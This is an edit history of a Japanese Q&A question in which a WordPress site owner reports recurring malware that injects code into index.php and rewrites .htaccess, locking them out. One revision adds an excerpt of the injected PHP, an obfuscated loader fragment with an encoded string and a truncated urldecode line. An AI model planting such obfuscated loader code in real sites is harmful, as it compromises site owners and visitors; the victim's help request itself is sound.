質問編集履歴
2
test
CHANGED
|
File without changes
|
test
CHANGED
|
@@ -1,6 +1,4 @@
|
|
|
1
1
|
wordpressのサイトがマルウェア感染しました。
|
|
2
|
-
|
|
3
|
-
対象サイトhttp://howto-taiwan.com/
|
|
4
2
|
|
|
5
3
|
|
|
6
4
|
|
|
@@ -13,8 +11,6 @@
|
|
|
13
11
|
#現状
|
|
14
12
|
|
|
15
13
|
現状としてはindex.phpへコードの挿入と.htaccessが勝手に書き換えられてアクセスできなくなってしまいます。
|
|
16
|
-
|
|
17
|
-
http://howto-taiwan.com/wp-admin/
|
|
18
14
|
|
|
19
15
|
|
|
20
16
|
|
1
挿入コード追加
test
CHANGED
|
File without changes
|
test
CHANGED
|
@@ -19,6 +19,18 @@
|
|
|
19
19
|
|
|
20
20
|
|
|
21
21
|
index.phpの挿入コードと.htacessをサーバーから初期化すれば一度ログインできますが、半日ほどたつとまた書き換えられてログインできなくなってしまいます。
|
|
22
|
+
|
|
23
|
+
|
|
24
|
+
|
|
25
|
+
###index.phpへ挿入コード(長過ぎるので抜粋、文字列は毎回変わります。)
|
|
26
|
+
|
|
27
|
+
<?php
|
|
28
|
+
|
|
29
|
+
$O00O__0O_='wacHsRz0gczDso1vjLnzaMlwbNyD7kotgYp2uga0pL9XfY3zuLjm6dpp5Z7XfJ3x9d3W5V6lqbni95mj8b22x0n=';
|
|
30
|
+
|
|
31
|
+
$O0_O0OO__=urldecod("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B64%($O00O__0OO_);?>
|
|
32
|
+
|
|
33
|
+
```
|
|
22
34
|
|
|
23
35
|
|
|
24
36
|
|